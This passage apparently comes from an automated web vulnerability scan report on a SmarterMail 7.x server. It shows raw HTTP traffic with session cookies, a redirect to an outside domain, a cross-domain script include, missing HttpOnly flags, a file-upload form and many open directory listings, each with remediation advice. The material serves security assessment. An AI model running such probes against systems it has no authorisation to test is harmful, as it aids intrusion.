Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
X-AspNet-Version: 2.0.50727
Location: http://cloudscan.me?aspxerrorpath=/UserControls/Popups/frmAddReportItem.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 193
Connection: Close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://cloudscan.me?aspxerrorpath=/UserControls/Popups/frmAddReportItem.aspx">here</a>.</h2>
</body></html>

8.11. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmHelp.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmHelp.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /UserControls/Popups/frmHelp.aspx?url= HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5722
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
   SmarterMail Help
</title><lin
...[SNIP]...
<li>
               <a target="_blank" href="http://www.smartertools.com/Help/SmarterMail/v7/Default.aspx?p=_USR&v=7.2.3925&lang=en-US&page=">Help for this Page</a>
...[SNIP]...
<li>
               <a target="_blank" href="http://www.smartertools.com/Help/SmarterMail/v7/Default.aspx?p=_USR&v=7.2.3925&lang=en-US">Help Topics</a>
...[SNIP]...
<li>
               <a target="_blank" href="http://www.smartertools.com/Help/SmarterMail/v7/Default.aspx?p=_USR&v=7.2.3925&lang=en-US&page=search">Search Online Help</a>
...[SNIP]...
<br />
       <a href="http://www.smartertools.com" id="ctl00_MPH_STLink" target="_blank">http://www.smartertools.com</a>
...[SNIP]...

9. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmPrintPreview.aspx

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /Reports/frmPrintPreview.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:59 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2831
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Print Prev
...[SNIP]...
</title>

   <script type="text/javascript" src="http://code.jquery.com/jquery-1.2.6-vsdoc.js"></script>
...[SNIP]...

10. Cookie without HttpOnly flag set  previous  next
There are 4 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://vulnerable.SmarterMail 7.x.host:9998/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:23:26 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=wmcwqwar3z1uqmbg32jkdrmv; path=/; HttpOnly
Set-Cookie: SM5Skin=Default; expires=Thu, 01-Oct-2020 22:23:26 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 30030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Login.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55
Content-Length: 999

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24LoginImageButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUm
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:08 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: SelectedLanguage=; expires=Thu, 01-Oct-2020 22:19:05 GMT; path=/
Set-Cookie: settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; expires=Thu, 01-Oct-2020 22:19:05 GMT; path=/
Set-Cookie: SM5Skin=Default; expires=Thu, 01-Oct-2020 22:19:05 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 53
Connection: Close

35|pageRedirect||/Main/frmWelcome.aspx?unframed=true|

10.3. http://vulnerable.SmarterMail 7.x.host:9998/Logout.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Logout.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Logout.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}

Response

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:48:12 GMT
X-AspNet-Version: 2.0.50727
Location: /Login.aspx
Set-Cookie: SM5Skin=Default; expires=Fri, 02-Oct-2020 00:48:12 GMT; path=/
Set-Cookie: settings=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 130
Connection: Close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fLogin.aspx">here</a>.</h2>
</body></html>

10.4. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmDeviceSync.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /UserControls/Popups/frmDeviceSync.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=
Content-Length: 17133

ctl00%24ScriptManager=ctl00%24ScriptManager%7Cctl00%24BPH%24chkShowAtLogin&__EVENTTARGET=ctl00%24BPH%24chkShowAtLogin&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTkxNjAzNDgyNg8WBB4QX19fUmVzdW
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:51:07 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: SM5Skin=Default; expires=Fri, 02-Oct-2020 00:51:07 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 25944

11|updatePanel|ctl00_UpdatePanel1|
               
           |3645|updatePanel|ctl00_MPH_splitter1_paneMobileDescription_UpdatePanel1|
                           <div class='DeviceWrapper'><div class='DeviceName'>Apple iPod and iPhone<
...[SNIP]...

11. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmUploadContacts.aspx

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /Main/frmUploadContacts.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:12 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10230
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Import Contacts - hoytll
...[SNIP]...
<td class=" Setting"><input name="ctl00$MPH$Uploader$FilePath" type="file" id="ctl00_MPH_Uploader_FilePath" size="50" maxlength="5242880" /><br />
...[SNIP]...

12. Directory listing  previous  next
There are 72 instances of this issue:

Issue description

Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.

Issue remediation

There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:


12.1. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/

Request

GET /App_Themes/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:02 GMT
Content-Length: 1325
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-famil
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.2. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/

Request

GET /App_Themes/Default/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 1984
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {fo
...[SNIP]...
<PRE>
<A href="/App_Themes/">[To Parent Directory]</A>
...[SNIP]...

12.3. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/

Request

GET /App_Themes/Default/CSS/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:02 GMT
Content-Length: 2458
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.4. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/BrowserOverrides/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/BrowserOverrides/

Request

GET /App_Themes/Default/CSS/BrowserOverrides/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1399
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/BrowserOverrides/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bla
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.5. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Error/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Error/

Request

GET /App_Themes/Default/CSS/Error/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Error/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.6. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/FileDownload/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/FileDownload/

Request

GET /App_Themes/Default/CSS/FileDownload/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1423
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/FileDownload/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.7. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/GettingStarted/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/GettingStarted/

Request

GET /App_Themes/Default/CSS/GettingStarted/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1417
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/GettingStarted/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.8. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Login/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Login/

Request

GET /App_Themes/Default/CSS/Login/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Login/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.9. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Mail/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Mail/

Request

GET /App_Themes/Default/CSS/Mail/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1911
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Mail/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.10. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Main/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Main/

Request

GET /App_Themes/Default/CSS/Main/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 4651
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Main/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.11. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Popup/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Popup/

Request

GET /App_Themes/Default/CSS/Popup/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
